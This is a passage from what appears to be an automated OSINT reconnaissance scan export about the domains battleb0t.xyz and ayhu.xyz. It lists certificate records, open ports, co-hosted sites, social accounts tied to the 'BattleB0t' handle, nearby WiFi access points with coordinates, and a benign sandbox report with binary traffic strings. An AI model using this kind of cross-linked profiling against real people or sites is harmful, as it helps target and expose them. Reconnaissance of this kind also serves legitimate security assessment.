[u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:10:37 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.108.154:443 | 185.199.108.0/24 |
| 2023-05-12 03:03:18 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:f3:5c:50:fa:14:e0:3f:8b:c6:63:22:13:37:d5:
cb:b8:bd:8b:1e:a5:6b:3e:a7:72:86:59:28:5c:40:
8b:1c:f8:2f:50:4b:f5:ef:0d:c5:e9:de:f9:20:da:
78:1c:0d:66:f9:dc:3f:93:0b:74:ad:7f:b2:a1:7a:
56:57:3c:77:28:5a:1a:58:66:08:52:f6:b9:f7:00:
cb:6d:f6:d8:ce:be:b0:7d:24:54:62:4e:58:7b:85:
b9:a9:b7:ac:6a:8d:99:a5:06:fd:0d:b0:88:77:c4:
1e:ca:a9:28:8a:9d:40:a2:d0:47:0a:5a:ad:c2:3d:
86:b0:bc:4e:c3:7b:51:cd:65:3e:10:7e:3b:3a:f9:
c4:70:b5:67:78:ac:bb:4f:31:b9:51:1b:63:89:e0:
2e:5b:c6:8b:52:39:42:6a:aa:6d:6c:72:68:d0:4f:
7c:c9:6a:0a:9c:f8:75:aa:50:d4:8d:ce:7f:ca:28:
87:8a:b7:bc:e2:04:a3:9b:bd:0d:fe:95:0c:de:fb:
3a:e4:bd:4d:5a:d2:f2:ba:0e:54:6d:82:9a:5c:f9:
ee:f6:a3:1e:93:71:37:5f:83:bf:08:49:75:e7:cf:
fc:13:fc:3c:21:17:a8:95:ac:1a:b0:0b:09:b4:ce:
a6:d7:8e:cb:8b:5e:2f:81:f3:69:1e:af:dd:1c:d1:
d3:27
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 13 19:07:08.083 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D0:FF:78:AE:C3:62:89:90:F2:A9:F6:
CF:41:A5:B6:AB:51:6D:6E:FB:5E:D8:9D:88:9E:50:39:
26:BD:EC:AC:34:02:21:00:BC:89:FB:E2:F1:35:F7:00:
0B:4C:4C:DE:C4:12:88:E0:4F:52:7D:18:21:0D:AC:62:
BC:76:DD:A2:F8:3F:5B:1D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 13 19:07:08.583 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:51:94:B0:CF:3C:86:38:A4:D9:80:6F:E3:
EC:3D:37:CB:B4:65:E2:35:17:5E:BA:96:76:F4:A6:90:
1D:6A:AE:4B:02:21:00:9D:89:ED:FC:FA:3F:52:5C:6A:
FF:DA:D2:C4:54:F3:CB:81:7B:1B:4B:4F:01:26:9F:C1:
04:B7:D6:CE:B9:77:B8
Signature Algorithm: sha256WithRSAEncryption
91:4e:e2:bf:36:57:41:de:a3:6f:91:fb:a2:73:ec:c8:9e:f7:
1f:0d:59:7b:c6:09:e3:fb:bf:a4:c2:8a:32:fa:c4:f6:df:3f:
aa:05:e0:24:98:16:08:84:62:26:41:b9:6f:39:f4:71:d6:ee:
5c:b1:36:f4:e8:21:c1:33:ce:b6:3c:af:4d:e7:18:2f:6c:27:
6e:cd:40:66:5d:d7:bd:71:74:93:04:96:39:63:25:d2:be:99:
3b:37:81:f8:a4:eb:0b:81:a4:3b:25:e3:9f:76:85:e0:0f:1a:
92:b6:27:46:71:61:51:3a:f7:5d:72:65:00:9d:09:05:5c:de:
c1:d4:54:d5:5a:d7:d7:34:d4:2c:67:0d:f8:a4:f0:c4:3a:47:
80:3c:8b:81:06:a8:34:d6:42:45:55:c8:42:f9:cf:43:4d:ee:
bd:e9:55:d7:d8:77:a3:d9:4c:76:08:4a:3c:a8:97:42:30:c9:
07:48:ea:bf:5e:b8:93:d2:56:00:0f:04:1c:00:01:69:ac:de:
20:d1:8a:7a:88:01:7c:94:e0:3d:d3:30:5e:a9:3c:d3:38:56:
5b:30:14:08:f5:b9:a1:f9:56:6c:72:be:02:ce:ad:d8:53:46:
35:20:ba:70:c5:77:bf:fa:4e:08:fb:a6:cd:30:77:f4:dc:52:
90:b6:5b:91
|
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00d.github.io | 185.199.111.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-003
(Net ID: 00:07:0E:65:CF:39) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | james-gamboa.github.io | 185.199.108.153 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:443 | 172.67.135.9 |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 137.97.148.34.bc.googleusercontent.com | 34.148.97.137 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Je buurman (Net ID: 00:01:71:0C:63:FC) | 52.3759, 4.8975 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomD04238 (Net ID: 00:0C:F6:D0:42:38) | 50.8897, 6.0563 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Villa (Net ID: 00:01:E3:07:FC:86) | 50.1188, 8.6843 |
| 2023-05-12 02:44:31 | Affiliate - Internet Name | No | DNS Resolver | 23 | 0 | 2 | 0 | None | cdn-185-199-111-153.github.com | 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Wowhead (Category: gaming)
https://www.wowhead.com/user=login | login |
| 2023-05-12 02:54:22 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://www.ayhu.xyz/cdn-cgi/styles/challenges.css | https://www.ayhu.xyz/ |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.65): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | kekw.battleb0t.xyz | [{"url": "https://kekw.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | GHARANA (Net ID: 00:01:E3:0F:5B:9B) | 50.1188, 8.6843 |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | TikTok (Category: social)
https://www.tiktok.com/@_BattleB0t_?lang=en | _BattleB0t_ |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | imgur (Category: images)
https://imgur.com/user/Battleb0t/about | Battleb0t |
| 2023-05-12 02:55:12 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://dai.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3588"\n "IsoScope_e04_IESQMMUTEX_0_519"\n "IsoScope_e04_IESQMMUTEX_0_331"\n "IsoScope_e04_ConnHashTable<3588>_HashTable_Mutex"\n "IsoScope_e04_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_e04_IE_EarlyTabStart_0xea0_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3588"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"dai.com"\n "www.dai.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"dai.com"\n "www.dai.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:80"\n "104.22.14.253:80"\n "104.22.14.253:443"\n "104.16.122.175:443"\n "216.239.32.178:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpdai.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "F11KGYX1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\F11KGYX1.txt]- [targetUID: 00000000-00003588]\n "sharect_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "~DFE2916D6CF490E071.TMP" has type "data"- Location: [%TEMP%\\~DFE2916D6CF490E071.TMP]- [targetUID: 00000000-00003588]\n "analytics_3_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "mexico-blog-hero_1_.jpg" has type "JPEG image data progressive precision 8 903x495 components 3"- [targetUID: N/A]\n "_7D9BD89C-B41E-11ED-92C7-080027889E1B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_72D7BA37-B41E-11ED-92C7-080027889E1B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF6EC52A9F677717F8.TMP" has type "data"- Location: [%TEMP%\\~DF6EC52A9F677717F8.TMP]- [targetUID: 00000000-00003588]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "yjb4iuu_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "d_3_" has type "Web Open Font Format CFF length 20688 version 0.0"- [targetUID: N/A]\n "d_2_" has type "Web Open Font Format CFF length 20024 version 0.0"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "R60X53XL.htm" has type "HTML document ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\R60X53XL.htm]- [targetUID: 00000000-00002992]\n "p_1_.gif" has type "GIF image data version 89a 1 x 1"- [targetUID: N/A]\n "d_1_" has type "Web Open Font Format CFF length 20656 version 0.0"- [targetUID: N/A]\n "less-obviously-not-ethiopian_1_.jpg" has type "JPEG image data progressive precision 8 903x495 components 3"- [targetUID: N/A]\n "d_1_" has type "Web Open Font Format CFF length 20700 version 0.0"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: www.dai.com\nConnection: Keep-Alive"\n "?Z.+uZ/\';<k~YY7~!QY-W#,?8_9%x$yGAUZInv[^1?^AAPrbL57wvwWa&[O{G(HcWiCt/_F\'qNp|}~8|y8po.\\niDOz[z&Z/w^.6+){2b{o4i3Teh01Z^n,ZfLLY+u ^_>SOX=Zv})9}~xbeVW7\nYM0^+=}:Sz=,8bsbe8vq!bt^f\n7f~FF/o-O~zw8.z/#/Mgh_n}~9t}\\g/boSm=}Z(Y\\Ojl{~d`sP~Yzg3}~vf\\YW/lo5{|lkmNfBU<5gOv]zOf;^\\w3nghZllh}=/?9?IfZvnW:>58A#O|jrfB7|h&5~ck=qPza-\n;$yB-Q}x~VnsTDvym8GaLS:g~_/6ank=S;y~TJ2#|={R|_{R|;u#qN<;_S},)Ej1&ZG7DH:?W~x#uF9?WNggyxB!\'V`jF^{Qjak0T<a)$i~p,4qOIDg#,[%y\\Ww5?"6jC:~wwuM5Q8Cx!Vmwl{", ">.Mat}>={>EjHOW$>SO1QKvw\\f|tY4P8aIbsyf+s<2Oyw{YprACte\'&X\\~naA_fC^_N,o:_rEo@Z}v>^gA:MXvb=fE[2V68Y|q<=%C)uRqwWW*...pC,zdN*Mxdm4)!Pk(e\n.6C,6\nM^~1Bl>n>S>$Wa5lY`Xrd;4f=_:>nYnrOu[jZ]iS57)"U\'ag5jM^Pkjsk./<5\nSVik_S\ny]UMUKB\\fxKrmFhejWVM0ls=\\tvpaOnDa\nWu3&7M^:}7?-TcUO/uLr_ZSXZ@m5DYiU>NJO5.1Uq"MbumiUU[5VUn]+JVUi0p_44MXUq1uZBUT@G]j]cR5-B@mB6M4E[V:@]&92JLhJ&[U%SZ(l0JU2Jue,@RAXWiM^(Q>qS\nhnmEqxrW>I\nv>.K3- Bj\nq[HYX?&P\')fka(EAf[:M+WD)*.ne<mK{V]vgKc\\a7lj[*MKd:BuI_>* \nizsgmZHaQ8LhYImy+$)lm\\Q8HW"4}meM_RAS6F6[ }Y^g[mr:dyYV&:io", "+hWI2KV1Qt"\nwM:[&xCKVuTm@RU&Fw*L\'[61V{+S1tIz8QW"1Ou[@XUEXhX\nXhiWYGP;^e@r\nPUfXk*qA\np\\\n.E%oW:s$^DV@c=]\n:]%+y?yx0>7YFA.;wi~%DG`\'.JIi5D,L-DSHQ]<UJVp+v<lycTah6UTMWICXBWSl\n;^J*,$=*v<KW\\KbI,]@Nhp! ]hVu.r|;]\'U85\\e*;@eU\'\n05&@6lb,i5[Z0urkf#Ug-2\nQ#8ehudD\\\'o]X[kgt 8h!*`")&-pr+nPFrK76SuLM\\%FE.cade#&tuo%pipvi\'K6!!M(M~Rsm(\\n*?glXv>Mp4oU0^P>|,8^UJmx%qpp\\ah"\n`WTc<Z]%(J<}H$A1(BkQ7)fXt_4OUFKx!jrusCO}vIJa(Mrd,XT\'}Q!EY(wP`w[grUR&1Tk3h\nC0G\\UUR1otqZv0\\bhpw)d7d$\n(Lda6,ZxqJT0_F3T#a:YpnT"iD;a9Fb\n$W.6i#-&r&-[K0RX/e\nsH><^ [BK ]q3Kk,X+"`hl}*\'!wE~d`&3g-8"]$kW`Gcg", "EWLdbw"8~"V\\asbL3]N0zjP%8dV?q;v\\tY?,,ze;hOHP2JUHI<r)+[&K2b/"\\|yP<rW\no/%8H8*R2H\ntGsA,\nHowLP&wU|PJky}N:@@P]B&T+$GL"\\Sp\\\'\'Vdw<\\mFQ(X5"6}`4x]jN!#b3*?T8<^a/<g5.5Ohd7IwbzsaAF$<S8/T<odD7S9S(CR^!dh_\'Df,z\nEqIhH"k*`ux0yapC.X~2K(`.?FrqegcHD2d8x"R*ae98AyE\n\\,Q?J]4h_cKd%J$*$*?%u$zwO;T$&Qt>>\\?lu~\naMgH}oD\nU&n"p%86"\'lgN~,\' Q\'=WI*;qE?Uj+Wy\n#dsVrLEv;\n&boP*Jy]j^y<S3`HNMOzE-pQY1^h\'Jk,pEBRWc<KAg1ZdQf\n!PF6"5+?wql2bVk"gRMN9Dc}#[,asF+u\n_IT\'*KTlBM]ke-25~F,NTDyvp%v)K0earG7<MhD#*8t5*394089K\n<f^iSs;cn|;u$1HUIxMA0It48%-\nI!`9T:=G9TU1G=TWqPrz&\'gRbT#:)ca#JXRs6LO_R(DG)%", "8HI22%H/J2qLN6IZMRk\nK_qU:QOd{G&`SN2\'q\\qVE*;8`y12<4VZzQ%?fG0WXTxTDDDIs\\V+>A4\'OJgQ*VfVVs\\L"*kqI5g,w9<{jSpUqD0lt<k%Eg7ShX&fd0clX](xvrh|h%D1cS1\nbz.J:5-uP!,NCZQE@e|IE"RV__JqJhCqRH!3=GY)*\\BSlyX R0mxRR#k0,ge96!(YY1%hwt4A1D5=LK^S<.WK_3o5MHH\'o:wwz#4(ii|UT9e\n[\\,kr(Jmr\\[UA$s58rmi#YjqyW,p`v$`gsoe#P|nWHpKEQ\\I_jB \\^qr)P$o2og`ah\n~mc@8qu f\\}jQ[%uU\n(,T_M0[Wj_U0]u}t8k[AI]5@ns(j)j`X5?wuE[TQ2KqJ;:V%q&hM^]JGQZ_x\n`MIR=O8-lSYZ\n1X)"KlZmi&zGV%Yyeo@gutN]BIjC5D-w:q0!(I-jZ<jPk#->5wTU-=|-<`k6!D<ZybHIQ5g\nr@U5Bq2B$4/Icu]P_-\nh())5H9p"\n "yw9q-Jm>"ka.S"CL[\nTR9.q\ntvPS4]\nzWjWM4KUEh*h{i-KGFPT.q][GmlS0bi\\ahS 